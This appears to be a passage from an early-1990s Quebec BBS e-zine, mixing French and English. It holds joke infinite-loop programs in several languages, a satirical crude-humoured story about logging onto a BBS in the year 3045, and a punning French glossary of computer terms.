30 END - QuickBASIC - Moron = 1 DO PRINT "Hello! I'm still Fairy Compst!" LOOP WHILE Moron = 1 - Turbo Pascal - (ce programme n'est pas assur de marcher) var lamer: boolean; begin lamer := true; repeat Writeln('NPShit's the best!'); until not lamer; end. - Turbo C++ - void main(void) { int moron; moron = 1; while (moron) printf("My name is Dental Flush\n"); } - Assembleur - .Model Small .Stack 256 .Data Lamer "NPShit is the best",13,10,"$" Lamer2 db 00; .Code MOV AX,@Data MOV DS,AX A:MOV DX,Offset Lamer MOV AH,9 INT 21h CMP [Lamer2],1 JNE A MOV AX,4C00h INT 21h - {COMMO} - {:LOOP} {SETV lame,true} {DISP 1,1,07,Read NPShit and become stupid!} {COMP lame,true} {IFCO LOOP} {} - Pseudo-Code - LAMER < VRAI REPETER ECRIRE "Dental Flush crit des bons articles" TANT QUE LAMER - ONS - Ŀ LAMER < VRAI Ĵ ECRIRE "Fairy Compst a 22 ans!" Ĵ LAMER - Ordinogramme - Ŀ Dbut Ŀ LAMER < VRAI Ŀ ECRIRE "NPShit is the best" <Ŀ /\ / \ VRAI < LAMER? > \ / \/ FAUX Ŀ FIN Note des rdacteurs A la lumire de ces informations on peut constater que le langage le plus puissant est le GW-BASIC car il ne prend que 3 lignes pour faire le travail! | | | Chronique ==-FICTION-== fiction fiction fiction... (yoo l'cho) pAr L'oGRe RuSSe tHiS iZ ThE sTorY Of A NpShIt OffIcEr In A QuEbEc cIty Bbs In tHe YeAR 3045. WeLL iT's COmPLiCaTeD tO WrIte ThIs WaY sO fuck the bidigital writing. -*- Hello. My name is L'ogre Russe Jr. Now I'm about to enter Galactwit BBS, the biggest board in Quebec City. Since it has 45674 unlimited nodes there's no need for autodial. I am currently using Telix 87.92 (Seems just like 3.12) Welcome on +---+ +---+ + +---+ +---+ +-+-+ + + + + +-+-+ | | | | | | | | | | | | | | -+ +---+ | +---+ | | | | | | | | | | | | | | | | | | | | | +---+ + + +--+ + + +---+ + +-+-+ + + BBS Home of NpShit! Ansi (C)Caillou Chanceux Jr. { Galactwit is using Future BBS, the most powerful BBS program in the world. It is wonderful. Anyway it is a lot like SuperBBS 1.17 so it's not too complicated to use. } Future BBS 1465.676.001 logon Name : L'ogre Russe Jr. Password: ****** { You can't see my password! Nyah Nyah Nyah! } Choose Language: 1 - English 2 - English 3 - English Which language? 1 { There are no other languages than English here in 3045. French language and all other languages in the world have been deleted accidentally by the SysOp. } Welcome L'ogre Russe Jr. on Galactwit BBS. You are the 785747894857th caller. Press [Enter] Grumaute Editorial 4783.89 (c)3045 by David Esturgeon from Bigoudeware Sorry (c)Caillou Chanceux, you can't hack this program! This is a beta test. If you have questions or whatever, ya know what to do +-+ +-+ + +-+ +-+ +++ +++ + +++ | | | | | | | | ||| | | | + +-+ | +-+ | | ||| | | | | | | | | | | | ||| | | +-+ + + +-+ + + +-+ + +++ + + Your Editor: Daniel Boudin Jr. ------------------------------------------------------------------------------ + + +-+ + + +-+ + | | | | | | | | +-+ +-+ | | | | | | | | | | | | + + +-+ +-+ +-+ +-+ + Sunday, 3045/45/55 Hi! It's Blitzcrest Jr! Well all is going very good here! We're AT LEAST going to get a CD-ROM on our board! By the way, NpShit #456335 will talk about Guatemala birds sexual approaches in winter. BLITZCREST JR. ------------------------------------------------------------------------------ [Enter] { The news are wonderful. Anyway it's mostly because they're done by Blitzcrest Jr, coz Daniel Boudin Jr. isn't very good in syntax and grammar. } +-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + + | | | | | | | | | | | | | | | | | | | | | +-+ | | | | | | | +-+ | | | | | | | | | | | | | | | | | | | | | | | + + + + + + + +-+ + + + +-+ + +-+ +-+ +-------+ | |\ | | | | \ | | NpShit Support Area of Quebec City!!!!!!! | | \| | +-------+ (m)essage (f)ile (b)ulletin (!)logoff Main menu (c)Caillou Chanceux Jr. Your command: C This is not a command idiot, this is the copyright sign! Press [Enter] fucking moron: { Oops.. Fuck I'm embarrassed... } +-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + + | | | | | | | | | | | | | | | | | | | | | +-+ | | | | | | | +-+ | | | | | | | | | | | | | | | | | | | | | | | + + + + + + + +-+ + + + +-+ + +-+ +-+ +-------+ | |\ | | | | \ | | NpShit Support Area of Quebec City!!!!!!! | | \| | +-------+ (m)essage (f)ile (b)ulletin (!)logoff Main menu (c)Caillou Chanceux Jr. Your command: M { Let's see the messages. } ----- M E S S A G E - M E N U ----- (R)ead (W)rite (S)can (Q)uick-Scan! Combined mail: (C)hoose R(e)ad..... (-) Previous (!) Logoff Your command: E (F)orward (R)everse (N)ew (I)ndividual (Q)uit: Forward Combined section contains 567720550 messages, Numbered from 1 to 567720550. Start at which? (Enter/First (Yer crazy?!!)): { Fuck! I stroke F! Let's redo this. } (F)orward (R)everse (N)ew (I)ndividual (Q)uit: New Scanning new messages... One moment, searching inter-tron message scanner... Destroying messages 1 to 1... Scanning nodelist... One moment, connection on a sattelite... Attacking Martian bases... Computer is in DOS, one moment... Fatal error, rebooting... Coffee break, one moment... Thanks for waiting! MESSAGE: 567720548/567720550 BASE : NpShit Support FROM: Fairy CompSt Jr. TO: L'ogre Russe Jr. SUBJECT: NpShit 456335 DATE : 45/14/56 Salut L'ogre! Hahaa! Hey NpShit numro 456335 devrait sortir bientt mais je me demande ben de quoi on va parler... a te tenterait-tu de faire un article sur les poubelles du Bell? a serait original! Sli! Fairy Compst JR (Le arrire-arrire-arrire-petit-fils de l'autre mongole) (-/+) Replies... (R)eply (B)ack (N)ext (J)ump (Q)uit (!=/*): Reply { Fairy Compst made an ENORMOUS mistake. Fuck him!!! } Posting message to: Fairy Compst Subject: NpShit 456335 One moment, loading editor... Creating temporary file... Please wait, this is only an Intel 8486! Searching lost clusters... Line editor. Word will wrap if you press [Enter] at the end of each line. Blank line will bring you to the editor options. 1> Message Commands: (C)ontinue (Q)uote (S)ave (A)bort: Quote 1>FCJ>Salut L'ogre! Hahaa! Hey NpShit numro 456335 devrait sortir bientt 2>FCJ>mais je me demande ben de quoi on va parler... a te tenterait-tu de 3>FCJ>faire un article sur les poubelles du Bell? a serait original! 4>FCJ> 5>FCJ>Sli! 6>FCJ>Fairy Compst JR (Le fils de l'autre) 7>. 8>HEY! You don't know this is an ENGLISH story! If you talk in 9>French, people in other countries where NpShit is distributed 10>won't understand a word from what you said! 11>. 12>L'oGrE rUssE jR 13> Message Commands: (C)ontinue (Q)uote (S)ave (A)bort: Save { This is a good job done. I hope he won't redo this stupid mistake again..! } Saving message... Scanning for viruses... Checking for message INTEGRITY, please wait... Verifying English syntax... Sending garbage for fun: Message lost. That's a joke. Thanks for not suiciding yerself. { Argggghhhhh! This is a BIT long... Ah! I'll download the last NpShit release! This way you'll see how xfers are powerful in 3045! } Uh-Oh, you're CHATTED by the SysOp Daniel Boudin Jr! { FUCK IT ALL!! } Hi L'ogre Russe Jr., this is Daniel Boudin Jr. salur Hey! You have to speak in English! qeus ta di jai pa comprit Stupid Human Behavior! You're paid for being our official NpShit supporter, so please can you WRITE IN ENGLISH?!?! ign qes ta lodre ruse je cath pa se qe tu di cls Esti de moron, fais ESC au plus criss, chu dans une histoire SERIEUSE! a ok ma te chater taleur parse qe jai de qoi a demande Ben oui ben oui ENVOYE! cest ou le esc Laisse faire m'a sortir moi-mme!! j-}a|p NO CARRIER A/ CONNECT 658768483893 Welcome on +---+ +---+ + +---+ +---+ +-+-+ + + + + +-+-+ | | | | | | | | | | Stop Future BBS 1465.676.001 logon Name : L'ogre Russe Jr. Password: ****** Choose Language: 1 - English 2 - English 3 - English Which language? 1 { What a STUPID board program! It doesn't remembers the language you use or what?? } Welcome L'ogre Russe Jr. on Galactwit BBS. You are the 785747894858th caller. Press [Enter] Grumaute Editorial 4783.89 (c)3045 by David Esturgeon from Bigoudeware Sorry (c)CailStop +-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + + | | | | | | | | | | | | | | | | | | | | | +-+ | | | | | | | +-+ | | | | | | | | | | | | | | | | | | | | | | | + + + + + + + +-+ + + + +-+ + +-+ +-+ +-------+ | |\ | | | | \ | | NpShit Support Area of Quebec City!!!!!!! | | \| | +-------+ (m)essage (f)ile (b)ulletin (!)logoff Main menu (c)Caillou Chanceux Jr. Your command: N { You will now enter the NpShit secret & private area!! WOW! Wonderful! We will also download the latest release available! } -------------- NPSHIT SUPPORT -------------- (D)ownload NpShit (U)pload NpShit (W)rite a PRIVATE letter to NpShit (R)ead PUBLIC replies from NpShit (-) Return to main menu Ansi (c)Caillou Chanceux Jr. Your command: D Protocols: (A * indicates 3-dimensional xfer available) (X)modem (Y)modem Ymodem-(G) (Z)modem Zy(R)ion Jr (H)S/Link Jr * (F)uture Protocol Protocol: Future Protocol { Future Protocol is the only protocol that doesn't ask for the files to download before downloading! It is very great! } * Now fetching protocol program, FileDort is ready to SEND! * { Well, That's dull. I should have choosen SuperZModem to play Tetris while downloading. Ah! It's finished! It's because we have 658768483893 bauds modems! } Analyzing downloads... Updating FILES.BBS... Updating USERS.BBS... Updating DOWNLOADS.DAT... Updating SYSOP.DAT... Updating NATACHA.GIF... Checking for viruses... There was a virus in one of your files! Good luck! Checking for file integrity... Checking for text authors mental integrity... Please wait... Please wait... Please wait... Please wait... Please wait... 874 error(s) found! { I think I'm going to go to bed... } Perform another transfer now? (y/N): NOOOO! Returning to BBS... { I really don't know what would be more dull than all this... } Uh-Oh, you're CHATTED by the SysOp Daniel Boudin Jr! { DO ANYONE HAVE A GUN????? } Hi L'ogre Russe Jr., this is Daniel Boudin Jr. salu FUCK YA! qoi J'ai dit FUCK YA! FUCK YA FUCK YA FUCK YA catch-tu esti de crtin? tu ecrit tros vit je conpren pa Hannnnn... Qu'est-ce que tu veux? bin ony a des problaim abec vieu crouton Mphitso Jr? oui il di qon est de la movaize propagand tk des mot jai pa comprit Ah, c'est cause de son texte qu'il uploade partout? Ben on va le publier dans NpShit. a ouin Ben oui! a bon Bon peux-tu me laisser aller sur le bab? ben jai pa trouver le esc encor Cherche en haut gauche du clavier? non ya pa de esc ya rinqun trou avec pa de touche dedan ces mon frere qi es partit avec jepensr logr ruse alo alo a non laise moi pa tousul mon frere vien de retrouve min esc { That night, L'ogre Russe have been found, dead, hanging a gun. As you can see, in 3045, life isn't cute on Quebec City's boards...... Surely because NpShit was still there. } L'oGrE rUssE | | | Dictionnaire des niaiseries courramment dites dans NpShit par Paleolithic Parking Lot Bon... Comme nous ne nous comprenons mme pas nous-mmes quand on traduit des textes des revues anglaises, voici un dictionnaire que nous nous sommes concocts et o, nous l'esprons, nous pigerons souvent pour avoir l'air plus brillants. ACOUSTIC MODEM Modem qui ne fonctionne pas l'lectricit. Syn: Modem sec Ant: Modem lectrique ACTIVITY LOG Terreur des leechers comme nous. AMIGA Lire Ami Gars. Homme avec qui Dental Flush a des affinits. Voir FAIRY COMPOST. ANSI (1) Sorte de dessin. (2) Ajoutez un N au dbut et c'est la premire blonde Blitzcrest. Rep: 2. AUTOEXEC.BAT Batch file pour starter un char. BASIC Langage ben trop compliqu pour rien. D'ailleurs, le nom le dit. BATCH FILE Langage extrmement puissant utilis par les Officiers NpShit pour avoir l'air hot. Malheureusement on n'est pas encore aussi hot que notre Dieu Loocif Hair... Mais a va venir! BBS (1) Belle Bbelle Stupide. (2) Concours Val-Blair: the Best B-S. BLITZCREST Ami de Dental Flush. Hahahaha! BOARD Tann. BREAK CHARACTER Caractre cass. BUS Absorber du liquide. Ex: Blitcrest a BUS tout mon jus d'orange. C (1) 3me lettre de l'alphabet. (2) Ma note en programmation. CARRIER (1) Endroit o on trouve des pierres. (2) Un gnrateur de pomes. CHAT MODE Mode fline. CHIP Sel et vinaigre. COPY CON Commande pour faire des duplications de Blitzcrest. DEFAULT On en a plein. DEFAULT DRIVE Personne qui conduit trs mal. DISQUE DUR Disquette qui fait du bruit quand vous l'chappez terre. DISQUE MOU Disquette en pte modeler. N'existe pas. DOORS Groupe de musique. DOS Ce que vous avez en arrire du ventre. DOWNLOAD Activit prfre des Officiers NpShit. EDIT Le nom de la blonde Blitzcrest. EDLIN Ex-blonde Blitzcrest. HARD DISK Avant. FLOPPY DISK Aprs. FLOPPY DRIVE Conduite molle. FLOW CONTROL Contrle des naissances. FORMAT Mot utilis pour dsigner certaines grosseurs. Ex: Ce pot est de FORMAT 250 ml. HANDLE Poigne. HOT KEY Pratique en hiver pour les serrures geles. ID Ce que (c)Caillou Chanceux a profusion pour ses ANSIs. LAMER Mot interdit. C'est a qui faut dire, hein Dental Flush? LAMERZ Spa mieux! ROM Capitale de l'Italie. RAM Outil de propulsion marine manuelle. LINE NOISE ATM2 MAC 3 premires lettres du mot MacDonalds. MEMORY LOCATION Bail de 6 mois pour un usage temporaire de mmoire. MONITOR Ref. TERRAIN DE JEU. MORON Secte religieuse fucke. Stune gang de lamerZ! Oups, scuse Dental Flush! MOUSE Souris. MOOSE Orignal. OFF LINE Contraire de ligne ouverte. (Donc guichet ferm) OS/2 Le deuxime os. PAGE Composante d'un livre. PASCAL Nom de l'ex-chum Blitzcrest. PC Plus Criss. Ex: Traduisez ce texte pour NpShit au PC. POST Concurrent de Kellog's. RECORD Piton situ cot de PLAY. ROOT DIRECTORY Rpertoire o se trouve la bire. SCAN Quand est-ce. Ex: SCAN qu'on s'en va? SERIAL PORT Port crale. SHIFT KEY Cl de changement de vitesse. START BIT Aphrodisiaque. STOP BIT Claude Ryan. TERMINAL Type de phase. TURNAROUND CHARACTER Voir SRE. UART Voir PIASSE RONDE. UNIX Chais pas, probablement une mission au Canal Famille. USER (1) Qui a t beaucoup utilis. (2) Mot auquel il manque un S au dbut pour reprsenter ce que fait (c)Caillou Chanceux les week-ends. VIDEO Voir MADONNA. VIDEO MONITOR Responsable d'un terrain de jeux lectronique. | | |